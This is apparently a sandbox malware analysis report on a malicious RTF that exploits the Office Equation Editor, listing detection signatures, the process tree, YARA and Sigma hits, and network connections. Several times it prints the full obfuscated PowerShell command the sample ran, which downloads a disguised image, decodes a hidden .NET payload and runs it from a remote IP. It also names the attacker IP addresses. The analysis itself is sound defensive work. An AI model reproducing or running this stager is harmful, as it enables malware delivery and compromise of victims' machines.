Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4YlwTsmpuZ.rtf

Overview

General Information

Sample name:4YlwTsmpuZ.rtf
renamed because original name is a hash value
Original sample name:9904916ce3549610216e99d83e7e2135.rtf
Analysis ID:1466761
MD5:9904916ce3549610216e99d83e7e2135
SHA1:d5eefab14ee9d5afa6258d3b399b46f779a56901
SHA256:a887cfb81844497f8f88e558289f89d8edb3f277f142df636f5267cc8263d198
Tags:rtf
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Powershell download and execute
Document exploit detected (process start blacklist hit)
Installs new ROOT certificates
Obfuscated command line found
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Shellcode detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Script Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2980 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 2436 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3140 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3200 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
    • EQNEDT32.EXE (PID: 3404 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
4YlwTsmpuZ.rtfINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1ad3:$obj2: \objdata
  • 0x1abb:$obj3: \objupdate
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3200JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 3200INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0x11acc:$b2: ::FromBase64String(
    • 0x1357c:$b2: ::FromBase64String(
    • 0x10a7a:$b3: ::UTF8.GetString(
    • 0x118f9:$b3: ::UTF8.GetString(
    • 0x133dd:$b3: ::UTF8.GetString(
    • 0xd4bb0:$b3: ::UTF8.GetString(
    • 0xeaed2:$b3: ::UTF8.GetString(
    • 0x14027f:$b3: ::UTF8.GetString(
    • 0x140f59:$b3: ::UTF8.GetString(
    • 0x19aa4d:$b3: ::UTF8.GetString(
    • 0x19b012:$b3: ::UTF8.GetString(
    • 0x19b7f8:$b3: ::UTF8.GetString(
    • 0x19bf7e:$b3: ::UTF8.GetString(
    • 0x19f312:$b3: ::UTF8.GetString(
    • 0x1bad3b:$b3: ::UTF8.GetString(
    • 0x1bb2fe:$b3: ::UTF8.GetString(
    • 0x1bd9e0:$b3: ::UTF8.GetString(
    • 0x1bdffa:$b3: ::UTF8.GetString(
    • 0x1c2238:$b3: ::UTF8.GetString(
    • 0x1c78cb:$b3: ::UTF8.GetString(
    • 0x1cc781:$b3: ::UTF8.GetString(

    Exploits

    barindex
    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 23.95.235.16, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2436, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2436, TargetFilename: C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS

    System Summary

    barindex
    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2436, Protocol: tcp, SourceIp: 23.95.235.16, SourceIsIpv6: false, SourcePort: 80
    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba
    Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 91.92.254.29, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3140, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2436, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , ProcessId: 3140, ProcessName: wscript.exe
    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2436, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , ProcessId: 3140, ProcessName: wscript.exe
    Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 91.92.254.29, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 3140, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2436, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\greatideaforfollowers.vBS" , ProcessId: 3140, ProcessName: wscript.exe
    Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2436, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine|ba
    Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 2980, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ". ( $VErboSePreFErEnce.TosTRing()[1,3]+'X'-JoiN'')( (('94Ylink = YKohttps://uploaddeimagens.com.br/images/'+'004/807/053/origina'+'l/new_image.'+'jpg?1719846235YKo; 94YwebClient = New-Object System.Net.WebClie'+'nt; try { 94YdownloadedData = 94YwebClient.DownloadData(94Ylink) } catch { Write-Host YKoFailed To download data from 94YlinkYKo -ForegroundColor Red; ex'+'it }; if (94YdownloadedData -ne 94Ynull) { 94'+'YimageText = ['+'System.Text.Encoding]::UTF8.GetString(94Ydownload'+'edData); 94YstartFlag = YKo<<BASE64_START>>YKo;'+' 94YendFlag '+'= YKo<<BASE64_END>>YKo; 94YstartIndex = 94YimageText.IndexOf(94YstartFlag); 94YendIndex = 94YimageText.IndexOf(94YendFlag); if (94YstartIndex -ge 0 -and 94Yen'+'dIndex -gt 94YstartInd'+'ex) { 94YstartIndex += 94YstartFlag.Length; 94Ybase64Length = 94YendIndex - 94YstartIndex; 94Ybase64Command = 94YimageText.Substring(94Yst'+'a'+'rtIndex, 94Ybase64Length); 94Ycommand'+'Bytes = [Sy'+'st'+'em.Convert]::Fro'+'mBase64String(94Ybase64Command); 94YloadedAssembly = [System.Reflection'+'.Assembly]::Load(94YcommandBytes); 94Ytype = 9'+'4YloadedAssembly.GetType(YKoRunPE.HomeYKo); 94Ymethod = 94Ytype.GetMethod(YKoVAIYKo).Invoke('+'94Ynull, ['+'object[]] (YKotxt.FDW/11033/61.532.59.32//:ptthYKo ,'+' YKodesativadoYKo , YKodesativadoYKo , YKodesati'+'vadoYKo,YKoRegAsmYKo,YKoYKo)) } }') -crEPLAce 'YKo',[chAR]39 -crEPLAce([chAR]57+[chAR]52+[chAR]89),[chAR]36) )", CommandLine: 